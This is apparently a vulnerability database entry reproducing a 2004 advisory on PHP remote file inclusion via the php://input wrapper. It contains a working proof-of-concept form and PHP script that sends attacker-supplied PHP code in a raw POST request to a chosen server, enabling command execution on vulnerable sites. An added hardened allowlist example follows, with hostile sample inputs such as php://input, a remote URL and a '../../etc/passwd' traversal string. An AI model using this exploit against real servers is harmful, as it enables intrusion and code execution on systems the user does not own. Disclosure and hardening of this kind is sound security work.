PHP 4/5 – Input/Output Wrapper Remote File Inclusion Function Command Execution
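Vulnerability ID | 1054479 | Vulnerability type | |
Published | 2004-05-27 | Updated | 2004-05-27 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | PHP | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit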
source: http://www.securityfocus.com/bid/10427/info
PHP is reportedly affected by an arbitrary command-execution weakness through the PHP 'include()' function. This issue is due to a design error that allows the execution of attacker-supplied POST PHP commands when URI data is used as an argument to an 'include()' function.
This issue affects the PHP module itself; however, the problem presents itself only when an application uses a user-supplied URI parameter as an argument to the 'include()' function.
This issue is reported to affect all versions of PHP since 3.0.13. Furthermore, this issue is not resolved by setting the 'php.ini' variable 'allow_url_fopen' to off.
Successful exploitation of this issue will allow an attacker to execute arbitrary PHP code on the affected computer; this will allow the execution of commands on the underlying operating system with the privileges of the affected webserver process.
<form action="" methode="post" >
target server : <input type="text" name="server" ><br><br>
target file (including URI parameter used in include() call ex:"index.php?includeParam=") : <input type="text" name="file" ><br><br>
exec (enclose php commands between <? .. ?> tags): <input type="text" name="cmd" ><br><br>
<INPUT type="submit" value="send">
</form>
<?
if($cmd){
$message = "POST /".$file."php://input HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: fr\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen( $cmd )."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cache-Control: no-cache\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
while(!feof($fd)) {
echo fgets($fd,1280);
}
fclose($fd);
}
?>
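
The hardened counterpart to the include() pattern the advisory describes, as an added example that is not part of the original advisory or PoC. The page names, the `pages` directory and `resolve_page()` are hypothetical; `includeParam` is the parameter name used in the form above.

```php
<?php
// Added example (not from the advisory). Page names and paths are hypothetical.

// Vulnerable pattern the advisory describes: request data reaches include()
// unchanged, so a value such as "php://input" makes PHP run the POST body.
//   include($_GET['includeParam']);

// Hardened pattern: request data only selects a key in a fixed map and is
// never concatenated into the path handed to include().
const PAGE_DIR = __DIR__ . '/pages';   // assumed template directory
const PAGES = [                         // assumed allowlist of page keys
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

/**
 * Return the absolute path to include for a requested page key,
 * or null when the value is not an allowlisted key.
 */
function resolve_page($requested): ?string
{
    // Arrays (includeParam[]=x) and other non-strings are rejected outright.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key lookup: stream wrappers (php://input, data:), URLs,
    // traversal sequences and NUL bytes can never match a key in PAGES.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    return PAGE_DIR . '/' . PAGES[$requested];
}

// Constructed sample inputs, including the wrapper named in the advisory.
$samples = ['home', 'php://input', 'http://example.invalid/x.txt',
            '../../etc/passwd', "home\0.php", ['home']];
foreach ($samples as $value) {
    $path = resolve_page($value);
    printf("%-34s => %s\n",
        json_encode($value, JSON_UNESCAPED_SLASHES), $path ?? 'REJECTED');
}

// In the application:
//   $path = resolve_page($_GET['includeParam'] ?? 'home');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
```

On PHP 5.2.0 and later, keeping `allow_url_include` set to Off adds a second layer, since that setting governs `php://input` in include calls.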